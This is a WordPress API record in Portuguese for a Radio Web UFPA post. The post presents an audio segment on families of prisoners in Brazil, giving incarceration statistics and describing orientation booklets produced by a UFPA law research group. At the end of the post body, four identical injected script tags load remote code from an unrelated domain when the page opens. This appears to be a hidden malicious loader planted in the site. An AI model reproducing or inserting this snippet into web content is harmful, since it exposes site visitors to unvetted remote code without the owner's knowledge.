{"id":16158,"date":"2025-05-21T12:22:53","date_gmt":"2025-05-21T15:22:53","guid":{"rendered":"https:\/\/radio.ufpa.br\/?p=16158"},"modified":"2025-10-21T11:52:57","modified_gmt":"2025-10-21T14:52:57","slug":"familiares-encarcerados","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/","title":{"rendered":"Familiares de Encarcerados"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;Familiares Encarcerados&#8221;<\/p><p class=\"category\">UFPA Comunidade<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-FAMILIARES-DE-DETENTOS-EDITADO-LUANE-.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>O Brasil \u00e9 o terceiro pa\u00eds do mundo com o maior n\u00famero de pessoas encarceradas. S\u00e3o mais de 880 mil pessoas presas. Destes, 68% s\u00e3o negros e 55% t\u00eam entre 18 e 29 anos. Entre quem est\u00e1 \u201catr\u00e1s das grades\u201d 40% ainda aguardam julgamentos.<br><br>E quando algu\u00e9m \u00e9 preso toda uma fam\u00edlia \u00e9 atirada em uma nova realidade. Por isso, o Grupo de Estudos e Pesquisas Direito Penal e Democracia do Instituto de Ci\u00eancias Jur\u00eddicas da Universidade Federal do Par\u00e1 (ICJ\/UFPA) produziu, em parceria com o Instituto M\u00e3e Crioula e com o apoio da Faculdade de Direito da UFPA e do Fundo Brasil, cartilhas de orienta\u00e7\u00e3o que ajudam a sensibilizar a popula\u00e7\u00e3o sobre a realidade do sistema prisional paraense ao mesmo tempo que oferecem informa\u00e7\u00f5es a quem t\u00eam familiares presos. Tudo de forma did\u00e1tica e humanizada.<br><br><br>FICHA T\u00c9CNICA:<\/p>\n\n\n\n<p>PRODU\u00c7\u00c3O: Victor Lima<br>APRESENTA\u00c7\u00c3O, ROTEIRO E EDI\u00c7\u00c3O: Glauce Monteiro<br>EDI\u00c7\u00c3O E MONTAGEM: Jo\u00e3o Nilo e Luana Pimenta<br>DIRE\u00c7\u00c3O: Rosane Steinbrenner<\/p>\n\n\n\n<p><\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Familiares de Encarcerados\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\" aria-label=\"Read more about Familiares de Encarcerados\">Ler mais<\/a><\/p>\n","protected":false},"author":19,"featured_media":16301,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[43],"tags":[],"class_list":["post-16158","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-comunidade"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Familiares de Encarcerados - Radio Web UFPA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Familiares de Encarcerados - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"... Ler mais\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-21T15:22:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:52:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"460\" \/>\n\t<meta property=\"og:image:height\" content=\"260\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Ana Alexandre\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ana Alexandre\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\"},\"author\":{\"name\":\"Ana Alexandre\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d\"},\"headline\":\"Familiares de Encarcerados\",\"datePublished\":\"2025-05-21T15:22:53+00:00\",\"dateModified\":\"2025-10-21T14:52:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\"},\"wordCount\":181,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1\",\"articleSection\":[\"UFPA Comunidade\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\",\"name\":\"Familiares de Encarcerados - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1\",\"datePublished\":\"2025-05-21T15:22:53+00:00\",\"dateModified\":\"2025-10-21T14:52:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1\",\"width\":460,\"height\":260},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Familiares de Encarcerados\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d\",\"name\":\"Ana Alexandre\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g\",\"caption\":\"Ana Alexandre\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/ana\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Familiares de Encarcerados - Radio Web UFPA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/","og_locale":"pt_BR","og_type":"article","og_title":"Familiares de Encarcerados - Radio Web UFPA","og_description":"... Ler mais","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2025-05-21T15:22:53+00:00","article_modified_time":"2025-10-21T14:52:57+00:00","og_image":[{"width":460,"height":260,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1","type":"image\/png"}],"author":"Ana Alexandre","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Ana Alexandre","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/"},"author":{"name":"Ana Alexandre","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d"},"headline":"Familiares de Encarcerados","datePublished":"2025-05-21T15:22:53+00:00","dateModified":"2025-10-21T14:52:57+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/"},"wordCount":181,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1","articleSection":["UFPA Comunidade"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/","name":"Familiares de Encarcerados - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1","datePublished":"2025-05-21T15:22:53+00:00","dateModified":"2025-10-21T14:52:57+00:00","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1","width":460,"height":260},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-comunidade\/familiares-encarcerados\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Familiares de Encarcerados"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/b9cfd7d743f7ea1d2db6e06992adf50d","name":"Ana Alexandre","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d4b854647280caee606b89eb9f0e2b7d?s=96&d=mm&r=g","caption":"Ana Alexandre"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/ana\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/05\/UFPA-COMUNIDADE-CARTILHAS-FAMILIARES-DE-ENCARCERADOS-460-x-260-px.png?fit=460%2C260&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-4cC","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/16158","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=16158"}],"version-history":[{"count":8,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/16158\/revisions"}],"predecessor-version":[{"id":17662,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/16158\/revisions\/17662"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/16301"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=16158"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=16158"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=16158"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}